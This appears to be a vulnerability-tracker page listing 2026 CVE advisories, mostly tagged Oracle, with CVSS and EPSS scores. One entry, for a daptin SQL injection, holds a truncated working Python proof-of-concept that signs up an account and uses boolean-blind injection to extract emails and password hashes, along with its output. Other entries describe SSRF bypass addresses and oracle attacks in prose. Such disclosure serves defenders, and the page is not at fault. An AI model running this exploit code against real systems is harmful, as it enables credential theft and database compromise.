mosparo is the modern solution to protect your online forms from spam. Prior to 1.4.13, the automatic rule package source URL feature allows a project member with the editor role to store an attacker-controlled URL that the server later fetches. Because the server follows http/https redirects and does not restrict private or loopback destinations, this becomes a stored SSRF primitive that can be turned into an internal HTTP probing oracle. This vulnerability is fixed in 1.4.13.

SSRF Oracle
NVD GitHub
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-43914 HIGH PATCH This Week

Vaultwarden is a Bitwarden-compatible server written in Rust. Prior to 1.35.4, there is a security vulnerability in Vaultwarden that allows bypassing the login brute-force protection if email 2fa is enabled. If email 2fa is enabled, the unprotected 2fa-function send_email_login (email.rs, api endpoint /api/two-factor/send-email-login) also acts as an oracle determining whether a username-password combination is correct. An attacker can abuse that endpoint to brute-force passwords without rate-limiting. This works even for users who don't have email 2fa configured. This vulnerability is fixed in 1.35.4.

Authentication Bypass Oracle
NVD GitHub VulDB
CVSS 3.1
7.3
EPSS
0.0%
CVE-2026-44430 Go MEDIUM PATCH GHSA This Month

Server-side request forgery in MCP Registry's HTTP namespace verification endpoint allows unauthenticated attackers to reach internal IPv4 addresses via specially-crafted IPv6 addresses that encode or tunnel to RFC1918 and cloud-metadata services. The vulnerability exists in the private-address blocklist used by `safeDialContext`, which fails to block IPv6 6to4 (2002::/16), NAT64 well-known (64:ff9b::/96), NAT64 local-use (64:ff9b:1::/48), and deprecated site-local (fec0::/10) prefixes. On dual-stack and IPv6-only cloud deployments (GKE IPv6, AWS IPv6-only EC2, Azure NAT64), this enables direct connections to metadata services and internal Kubernetes API servers. No public exploit code identified at time of analysis, but proof-of-concept has been demonstrated against the production registry.

Kubernetes SSRF Microsoft Open Redirect Oracle
NVD GitHub VulDB
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-44000 npm MEDIUM PATCH GHSA This Month

Host object identity crosses the vm2 sandbox boundary when Promise resolution delivers objects to sandbox callbacks, allowing sandboxed code to mutate host objects and perform identity checks via WeakMap. The vulnerability stems from Promise.prototype.then wrapping that uses ensureThis() for conversion instead of stronger cross-realm proxying; when no prototype mapping exists, ensureThis() returns the original host object unmodified. This sandbox escape affects vm2 versions up to 3.10.5 and is fixed in 3.11.0.

Oracle Information Disclosure Red Hat
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-42593 Go MEDIUM PATCH GHSA This Month

Arbitrary PDF file read vulnerability in Gotenberg versions up to 8.31.0 allows unauthenticated remote attackers to extract PDF content via path traversal in stampExpression and watermarkExpression parameters on six conversion routes (pdfengines/merge, pdfengines/split, libreoffice/convert, chromium/convert/url, chromium/convert/html, chromium/convert/markdown). The vulnerability exists because these routes accept user-controlled file paths without validation when stamp or watermark source is set to PDF, unlike the dedicated stamp/watermark routes which enforce file upload requirements. An attacker can read any PDF accessible to the Gotenberg process by specifying its filesystem path, gaining access to potentially sensitive documents in containerized deployments or systems with mounted directories.

Microsoft Python Oracle Docker Google +1
NVD GitHub VulDB
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-44349 Go HIGH PATCH GHSA This Week

{"Content-Type": "application/json"}) try: return json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) except urllib.request.HTTPError as e: return json.loads(e.read(50_000)) def token(): post("/action/user_account/signup", {"attributes": { "name": "poc", "email": "poc@test.com", "password": "adminadmin", "passwordConfirm": "adminadmin"}}) body = post("/action/user_account/signin", {"attributes": { "email": "poc@test.com", "password": "adminadmin"}}) return next(i["Attributes"]["value"] for i in body if i.get("ResponseType") == "client.store.set") def rows(col, jwt): q = urllib.parse.urlencode({"query": json.dumps( [{"column": col, "operator": "fuzzy", "value": "zzzzz"}])}) req = urllib.request.Request(f"{BASE}/api/world?{q}&page%5Bsize%5D=5", headers={"Authorization": "Bearer " + jwt}) d = json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) return len(d.get("data", [])) def oracle(expr, jwt): col = f"reference_id) OR ({expr}) OR LOWER(world.reference_id" return rows(col, jwt) > 0 def extract_int(sql, jwt, hi=200): lo = 0 while lo < hi: mid = (lo + hi + 1) // 2 if oracle(f"({sql}) >= {mid}", jwt): lo = mid else: hi = mid - 1 return lo def extract_str(sql, jwt, maxlen=80): n = extract_int(f"LENGTH(({sql}))", jwt, hi=maxlen) s = "" for _ in range(n): lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 pfx = s.replace("'", "''") expr = f"({sql}) >= '{pfx}'||char({mid+1})" if s else f"({sql}) >= char({mid+1})" if oracle(expr, jwt): lo = mid + 1 else: hi = mid s += chr(lo) return s jwt = token() print("baseline :", rows("reference_id", jwt), "rows") print("tautology:", rows("reference_id) OR 1=1 OR LOWER(world.reference_id", jwt), "rows") jwt = token() print("sqlite_master table count:", extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'", jwt, hi=80)) print("email (row 1):", extract_str("SELECT email FROM user_account ORDER BY id LIMIT 1", jwt)) pw_hex = extract_str("SELECT HEX(password) FROM user_account WHERE email='poc@test.com' LIMIT 1", jwt, maxlen=40) print("pw hash prefix:", bytes.fromhex(pw_hex).decode("ascii", errors="replace")) ``` **Output** (measured on commit `5d32142`, SQLite, macOS arm64): ``` baseline : 0 rows tautology: 5 rows sqlite_master table count: 57 email (row 1): guest@cms.go pw hash prefix: $2a$11$W7vO9oOPzpf7u ``` --- **Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required. **What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.

SQLi PostgreSQL Python Oracle Apple
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-29080 PyPI CRITICAL POC PATCH GHSA Act Now

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.

SQLi PostgreSQL Java Python Oracle +1
NVD GitHub
CVSS 4.0
9.4
EPSS
0.1%
CVE-2026-35255 MEDIUM This Month

Malicious environment variable injection in Oracle Cloud Native Environment Command Line Interface v2.3.2 allows local authenticated users with low privileges to execute arbitrary code through user interaction, compromising systems running the affected CLI tool. The vulnerability requires local access and user action but results in high-impact code execution with full confidentiality and integrity compromise.

Oracle RCE Code Injection
NVD
CVSS 3.1
6.6
EPSS
0.0%
CVE-2026-35254 MEDIUM PATCH This Month

Oracle OCI CLI version 3.77 allows local attackers with user interaction to place imported files outside the intended directory, compromising file integrity and enabling potential code execution or data exfiltration. The vulnerability requires local access and user interaction but carries high integrity impact through arbitrary file placement. No active exploitation or public exploit code has been identified at the time of analysis.

Oracle Path Traversal Suse
NVD VulDB
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-23927 MEDIUM This Month

Zabbix Agent 2 allows remote attackers with high privileges to inject malicious Oracle TNS connection strings via the 'service' parameter, enabling credential theft from saved database sessions. The vulnerability requires network access and high-level privileges but can lead to disclosure of Oracle database credentials if they are stored in named sessions. CVSS 5.1 reflects the requirement for authenticated attacker access (PR:H), though the impact to stored credentials is significant.

Oracle Information Disclosure
NVD VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-35253 MEDIUM This Month

Oracle Macaron Tool v0.22.0 fails to properly validate host addresses in HTTP requests, allowing unauthenticated remote attackers to cause information disclosure through crafted network traffic. The vulnerability requires user interaction (UI:R) and affects the confidentiality of the tool's host validation mechanism. No active exploitation has been publicly confirmed.

Open Redirect Oracle
NVD VulDB
CVSS 3.1
4.7
EPSS
0.0%
CVE-2026-43881 PHP MEDIUM PATCH GHSA This Month

Unauthenticated user enumeration in AVideo objects/users.json.php allows remote attackers to disclose all registered user accounts via an isCompany parameter that bypasses admin-only access controls, and a users_id parameter that acts as a sequential-ID existence oracle. An unauthenticated attacker can harvest the complete user directory-including display names, numeric IDs, profile URLs, photos, and active/inactive status-in a single unbounded GET request, enabling credential stuffing and phishing campaigns. The vulnerability affects AVideo through version 29.0; vendor patch available.

Authentication Bypass Oracle CSRF PHP
NVD GitHub
CVSS 3.1
5.3
EPSS
0.0%
CVE-2026-43937 NuGet HIGH PATCH GHSA This Week

Authorization bypass in YAFNET forum software (versions ≤4.0.4) allows any low-privileged authenticated user to execute arbitrary SQL commands against the backend database. The flaw stems from a misplaced ASP.NET Core filter (`PageSecurityCheckAttribute`) that validates admin privileges *after* page handlers execute, enabling attackers to inject SQL via the `/Admin/RunSql` endpoint before the 302 redirect occurs. Publicly available exploit code exists (GitHub advisory GHSA-xhw7-j96h-c3g5) demonstrating time-based blind SQL injection to extract `@@VERSION` and manipulate identity tables. CVSS 8.8 (AV:N/AC:L/PR:L) reflects network-accessible exploitation requiring only a standard forum account-trivially obtained via self-registration on most deployments. Vendor-released patch available in version 4.0.5.

Oracle SQLi
NVD GitHub
CVSS 3.1
8.8
EPSS
0.1%
CVE-2026-35228 HIGH This Week

SQL injection in Oracle MCP Server Helper Tool 1.0.1-1.0.156 allows low-privileged authenticated attackers to execute malicious SQL queries with high confidentiality and integrity impact across security boundaries. The vulnerability requires network access via HTTP and user interaction, affecting the helper tool component. With CVSS 8.7 and easily exploitable characteristics (AC:L), this represents significant risk for organizations running affected versions, though no public exploit or active exploitation (CISA KEV) has been identified at time of analysis. The changed scope (S:C) indicates potential impact beyond the vulnerable component itself.

Oracle SQLi
NVD VulDB
CVSS 3.1
8.7
EPSS
0.1%
CVE-2026-42449 npm HIGH PATCH GHSA This Week

Server-Side Request Forgery (SSRF) in n8n-mcp SDK allows authenticated remote attackers to access cloud metadata endpoints and internal network resources via IPv4-mapped IPv6 address bypass. Versions 2.47.4 through 2.47.13 fail to validate IPv6 addresses in the synchronous URL validator (SSRFProtection.validateUrlSync()), enabling attackers who control the n8nApiUrl parameter to bypass RFC1918, localhost, and cloud metadata protections using addresses like [::ffff:169.254.169.254]. The vulnerability is non-blind SSRF returning response bodies to the attacker, and forwards the n8nApiKey in the x-n8n-api-key header to attacker-controlled targets. Confirmed actively exploited (CISA KEV). Vendor-released patch: version 2.47.14. EPSS exploitation probability not provided but risk is elevated given KEV status and availability of exploit code in the GitHub advisory.

SSRF Microsoft Oracle Docker Node.js
NVD GitHub
CVSS 3.1
8.5
EPSS
0.0%
CVE-2026-41659 PHP LOW PATCH GHSA Monitor

Admidio members_assignment_data.php endpoint leaks hidden profile field values through a blind search oracle attack. Role leaders with ROLE_LEADER_MEMBERS_ASSIGN permissions can infer exact values of hidden PII fields (birthdays, street addresses, cities, postal codes, countries) by observing which users appear in search results, despite these fields being suppressed from JSON output. The vulnerability affects Admidio versions up to 5.0.8 and is fixed in 5.0.9.

PHP Oracle Information Disclosure
NVD GitHub
CVSS 3.1
2.7
EPSS
0.0%
CVE-2026-42233 npm MEDIUM PATCH GHSA This Month

SQL injection in n8n's Oracle Database node allows attackers to inject arbitrary SQL commands through the Limit field when user-controlled input is passed via expressions, enabling data exfiltration from connected Oracle databases. Exploitation requires a specific workflow configuration where external input (e.g., from webhooks) reaches the Limit field; authentication depends on the webhook's access controls. The vulnerability affects n8n versions prior to 1.123.32, 2.17.4, and 2.18.1, and vendor-released patches are available.

Oracle Code Injection
NVD GitHub VulDB
CVSS 4.0
5.3
EPSS
0.0%
CVE-2026-40514 HIGH PATCH This Week

SmarterTools SmarterMail builds prior to 9610 contain a cryptographic weakness in the file and email sharing endpoints that use DES-CBC encryption with keys and initialization vectors derived from System.Random seeded with insufficient entropy, reducing the seed space to approximately 19,000 possible values. An unauthenticated attacker can use the attachment download endpoint as an oracle to determine the seed in use and derive encryption keys and initialization vectors to forge sharing tokens for arbitrary emails, attachments, or file storage contents without prior access to the targeted content.

Oracle Information Disclosure
NVD VulDB
CVSS 4.0
8.2
EPSS
0.0%
CVE-2026-41263 Go MEDIUM PATCH GHSA This Month

Traefik's BasicAuth middleware contains a timing side-channel vulnerability that allows attackers to enumerate valid usernames through response-time analysis. A map key/value confusion in the constant-time comparison fallback causes the `notFoundSecret` variable to always resolve to an empty string, causing authentication checks against non-existent users to complete in microseconds (~0.48ms) instead of performing full bcrypt evaluation (~62ms), creating a 130x timing oracle. Attackers can distinguish existing users from non-existent ones by measuring HTTP response times, enabling account enumeration without credentials.

Oracle Information Disclosure Python Red Hat Suse
NVD GitHub
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-35252 MEDIUM This Month

Vulnerability in the Oracle Security Service product of Oracle Fusion Middleware (component: C Oracle SSL API). Supported versions that are affected are 12.2.1.4.0 and 12.1.3.0.0. Difficult to exploit vulnerability allows low privileged attacker with network access via HTTPS to compromise Oracle Security Service. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Security Service accessible data as well as unauthorized access to critical data or complete access to all Oracle Security Service accessible data. CVSS 3.1 Base Score 6.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N).

Authentication Bypass Oracle
NVD
CVSS 3.1
6.4
EPSS
0.0%
CVE-2026-35251 HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-35250 LOW Monitor

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 2.3 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:L).

Denial Of Service Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
2.3
EPSS
0.0%
CVE-2026-35249 LOW Monitor

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 3.2 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N).

Authentication Bypass Oracle
NVD VulDB
CVSS 3.1
3.2
EPSS
0.0%
CVE-2026-35248 MEDIUM This Month

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle VM VirtualBox accessible data as well as unauthorized read access to a subset of Oracle VM VirtualBox accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 5.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L).

Denial Of Service Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
5.0
EPSS
0.0%
CVE-2026-35247 MEDIUM This Month

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.0 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N).

Authentication Bypass Oracle
NVD VulDB
CVSS 3.1
6.0
EPSS
0.0%
CVE-2026-35246 HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-35245 HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via RDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-35244 MEDIUM This Month

Vulnerability in the Oracle Hyperion Infrastructure Technology product of Oracle Hyperion (component: Lifecycle Management). The supported version that is affected is 11.2.24.0.000. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hyperion Infrastructure Technology. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle Hyperion Infrastructure Technology accessible data as well as unauthorized read access to a subset of Oracle Hyperion Infrastructure Technology accessible data. CVSS 3.1 Base Score 5.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:H/A:N).

Authentication Bypass Oracle
NVD
CVSS 3.1
5.2
EPSS
0.0%
CVE-2026-35243 HIGH This Week

Vulnerability in the Oracle Application Development Framework (ADF) product of Oracle Fusion Middleware (component: ADF Faces). Supported versions that are affected are 12.2.1.4.0 and 14.1.2.0.0. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Application Development Framework (ADF) executes to compromise Oracle Application Development Framework (ADF). Successful attacks of this vulnerability can result in takeover of Oracle Application Development Framework (ADF). CVSS 3.1 Base Score 7.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H).

Oracle Authentication Bypass
NVD
CVSS 3.1
7.8
EPSS
0.0%
CVE-2026-35242 HIGH This Week

Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). The supported version that is affected is 7.2.6. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).

Oracle Authentication Bypass
NVD VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-35241 MEDIUM This Month

Vulnerability in the PeopleSoft Enterprise CS Student Records product of Oracle PeopleSoft (component: Research Tracking). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise CS Student Records. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all PeopleSoft Enterprise CS Student Records accessible data. CVSS 3.1 Base Score 5.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N).

Authentication Bypass Oracle
NVD
CVSS 3.1
5.7
EPSS
0.0%
CVE-2026-35240 MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 8.0.0-8.0.45, 8.4.0-8.4.8 and 9.0.0-9.6.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass Red Hat Suse
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-35239 MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: DML). Supported versions that are affected are 8.0.0-8.0.45, 8.4.0-8.4.8 and 9.0.0-9.6.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass Red Hat Suse
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-35238 MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.0-8.0.45, 8.4.0-8.4.8 and 9.0.0-9.6.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass Red Hat Suse
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-35237 MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.0-8.0.45, 8.4.0-8.4.8 and 9.0.0-9.6.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass Red Hat Suse
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-35236 MEDIUM PATCH This Month

Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.0-8.0.45, 8.4.0-8.4.8 and 9.0.0-9.6.0. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

Oracle Authentication Bypass Red Hat Suse
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
EPSS 0% CVSS 8.8
HIGH This Week

Full takeover of Oracle WebLogic Server 14.1.2.0.0 and 15.1.1.0.0 is achievable by remote unauthenticated attackers via the Console component over HTTPS, provided a victim performs an action such as clicking a malicious link. The flaw carries a CVSS 3.1 base score of 8.8 with high impact across confidentiality, integrity, and availability, but exploitation hinges on user interaction. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

Oracle Weblogic Server Open Redirect
NVD VulDB
EPSS 0% CVSS 8.7
HIGH This Week

Cross-scope data compromise in Oracle WebLogic Server 14.1.2.0.0 and 15.1.1.0.0 allows a low-privileged remote attacker over HTTPS to read, create, modify, or delete critical data through the administration Console, provided a separate user is induced to perform an action. The CVSS 3.1 base score of 8.7 reflects high confidentiality and integrity impact with scope change reaching beyond WebLogic itself, and no public exploit identified at time of analysis.

Authentication Bypass Oracle Weblogic Server +1
NVD VulDB
EPSS 0% CVSS 8.8
HIGH This Week

SQL injection in the WP Review Slider Pro WordPress plugin (versions ≤12.6.8) allows authenticated attackers with Subscriber-level access to inject arbitrary SQL via the 'stypes' and 'slocations' JSON parameters of the wppro_get_overall_chart_data AJAX action. Because the vulnerable handler echoes the executed SQL back in its JSON response, attackers gain a built-in oracle that turns blind injection into a near-trivial database extraction primitive. No public exploit identified at time of analysis, but the very low privilege barrier on a default WordPress install makes any exposed site a realistic target.

WordPress SQLi Oracle +1
NVD VulDB
EPSS 0% CVSS 3.7
LOW POC PATCH Monitor

OliveTin's ValidateArgumentType RPC endpoint exposes action binding IDs and argument configurations to unauthenticated network requesters in all versions prior to 3000.13.0, functioning as an enumeration oracle. The bypass is particularly counterintuitive because it manifests specifically when AuthRequireGuestsToLogin is enabled - the hardened security posture - meaning operators who consciously locked down their instance are the ones exposed. The confidentiality impact is limited to internal action metadata (no credentials, no command execution), and no public exploit has been identified at time of analysis.

Authentication Bypass Oracle Olivetin
NVD GitHub
EPSS 0% CVSS 9.3
CRITICAL POC PATCH Act Now

Authentication bypass in Discuz! X5.0 releases 20260320 through 20260501 allows unauthenticated remote attackers to access database backup and restore functionality exposed by dbbak.php. The flaw stems from a shared cryptographic key (CWE-323) between UCenter integration and the backup API, which lets an attacker abuse an encryption oracle in logging_ctl::logging_more() to mint legitimately signed authorization tokens, and chain a race condition to impersonate arbitrary users. Publicly available exploit code exists and an upstream fix has been published on Gitee.

PHP Authentication Bypass Oracle +1
NVD Exploit-DB VulDB
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Blind SQL injection in Fleet MDM's Apple MDM commands endpoint allows authenticated Observer-role users to exfiltrate sensitive database column values - including host enrollment secrets, node_key, orbit_node_key, and APNS tokens - via a cursor-based binary search oracle. The `GET /api/v1/fleet/mdm/apple/commands` endpoint accepted an unsanitized `order_key` parameter injected directly into an SQL ORDER BY clause without column validation, exposing all columns on the joined `hosts` and `nano_enrollments` tables. Extracted node_key values enable full host impersonation against Fleet's osquery and Orbit endpoints, making the effective impact materially higher than the 6.5 CVSS base score implies. No public exploit has been identified at time of analysis; vendor-released patch is available in Fleet 4.84.2.

Apple SQLi Oracle
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

{id}/hosts accepts the attacker-controlled order_key parameter without column allowlist validation, enabling character-by-character secret reconstruction without secrets ever appearing in response bodies. No public exploit has been identified at time of analysis and no CISA KEV listing was provided, but the attack is deterministic and scriptable against any Fleet deployment where Observer role is broadly granted.

SQLi Oracle
NVD GitHub
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

Unauthenticated relation membership disclosure in Parse Server allows any client holding only standard public API credentials to read objects linked through a Relation field that is explicitly hidden by protectedFields, or linked to a parent object that is inaccessible under its ACL or class-level permissions. By supplying only a known or guessed owning object's objectId, a remote unauthenticated caller can enumerate all objects in a protected relation or use the $relatedTo operator as a membership oracle - confirming whether a specific child object is privately linked to a given parent. This directly undermines applications that use Parse Server's access control primitives to protect sensitive relationships such as private group memberships, block lists, or account-to-resource associations. No public exploit identified at time of analysis; vendor-released patches exist at versions 8.6.80 and 9.9.1-alpha.6.

Authentication Bypass Node.js Oracle +1
NVD GitHub VulDB
EPSS 0% CVSS 5.8
MEDIUM PATCH This Month

Server-side request forgery in Kolibri (pip/kolibri <= 0.19.3) allows network-reachable attackers to force the Kolibri server to issue outbound HTTP requests to arbitrary internal hosts, cloud metadata endpoints, and internal services, with JSON response bodies reflected directly to the caller. The primary GET endpoint at /api/auth/remotefacilityuser required no authentication whatsoever, making this exploitable by any party with network access to the Kolibri server. A working proof-of-concept was retained internally by the reporting researcher but was not published; no public exploit code exists and CISA KEV listing has not been identified at time of analysis.

Python Microsoft Docker +3
NVD GitHub
EPSS 0% 5.0 CVSS 9.8
CRITICAL POC KEV THREAT Emergency

Remote takeover of Oracle PeopleSoft Enterprise PeopleTools 8.61 and 8.62 is possible through the Updates Environment Management component via unauthenticated HTTP requests. The CVSS 9.8 vector (AV:N/AC:L/PR:N/UI:N) indicates trivial network-based exploitation against any internet- or intranet-exposed instance, with full confidentiality, integrity, and availability impact. No public exploit identified at time of analysis, but Oracle's 'easily exploitable' language and the unauthenticated nature make this a high-priority patching target.

Oracle Authentication Bypass Peoplesoft Enterprise Peopletools
NVD VulDB GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

